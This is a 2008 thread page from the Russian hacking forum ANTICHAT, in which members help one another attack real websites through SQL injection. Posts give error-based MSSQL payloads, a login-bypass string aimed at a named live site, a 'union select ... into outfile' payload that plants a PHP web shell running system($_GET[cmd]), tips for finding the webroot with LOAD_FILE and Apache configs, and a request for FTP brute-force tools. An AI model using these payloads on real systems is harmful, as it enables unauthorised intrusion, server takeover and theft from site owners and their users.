HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4021  
Старый 05.12.2008, 02:49
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

Если инъекция в пост запросе, ты плюсы ставишь? На сколько я заметил, там плюc канает за плюс и тд то есть:
1' or 1=(select user)+char(0x7e) выдаст : 'dbo~'

На недельке как налажу регексы планирую выложить свой софт для mssql инъекций.

Последний раз редактировалось SHS; 05.12.2008 в 02:52..
 
Ответить с цитированием

  #4022  
Старый 05.12.2008, 12:00
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
 
Ответить с цитированием

  #4023  
Старый 05.12.2008, 12:13
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от Ershik  
Почему-то не получается. так и так пробовал.
http://www.nuovemozioni.com/login.asp
ник') or 1=1--(пробел)
 
Ответить с цитированием

  #4024  
Старый 05.12.2008, 12:27
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
С нами: 9463474

Репутация: 155
По умолчанию

может не в тему чуток..но всё таки..чем напарсить линки для брута фтп?
да и Брутусае2 залейте...а то удалил его..
 
Ответить с цитированием

  #4025  
Старый 05.12.2008, 15:58
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию

Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(
 
Ответить с цитированием

  #4026  
Старый 05.12.2008, 16:07
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

Цитата:
Сообщение от geforse  
Где можно почитать про заливку шелла через SQL Inj ?
конкретно про это не нашёл подходящих статей(
union select 1,<? system($_GET[cmd]); ?>,3 from users into outfile '/www/site/temp/shell.php'/*

p.s: https://forum.antichat.ru/showthread.php?t=34338
 
Ответить с цитированием

  #4027  
Старый 05.12.2008, 16:13
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
С нами: 9351767

Репутация: 2
По умолчанию

Login: ' or 1=(@@version)--
Pwd: qwerty

exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', '' or 1=(@@version)--', 'qwery'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'or'.

Вот часть запроса выудил. Как можно сформировать запрос чтоб получить результат?
 
Ответить с цитированием

  #4028  
Старый 05.12.2008, 22:32
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

SHS попробуй войти вод админом )

Цитата:
exec et_CustomerLOGIN 'CE2381685624496CAE568A1C9FF9F951', 'admin or 1=1--', 'pass'
 
Ответить с цитированием

  #4029  
Старый 05.12.2008, 23:38
InvisibleSM
Новичок
Регистрация: 03.12.2008
Сообщений: 8
С нами: 9177163

Репутация: 1
По умолчанию

столкнулся с проблемой, делаю union select into outfile '1.txt' оно его сохраняет в папку var/db/mysql/ но это на уровень выше чем то где находится сам сайт, короче вот так http://aaa.ru/1.txt на него не зайдеш он где то ближе лежит, вопрос как узнать где лежит сайт? там можно без полного пути, начиная с var/

Последний раз редактировалось InvisibleSM; 05.12.2008 в 23:41..
 
Ответить с цитированием

  #4030  
Старый 06.12.2008, 00:09
desTiny
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
С нами: 10139366

Репутация: 1502


По умолчанию

InvisibleSM,
а) иногда помогает LOAD_FILE('/') - оно выведет листинг корня и т.п.
б) почитать конфиги апача в стандартных местах
__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.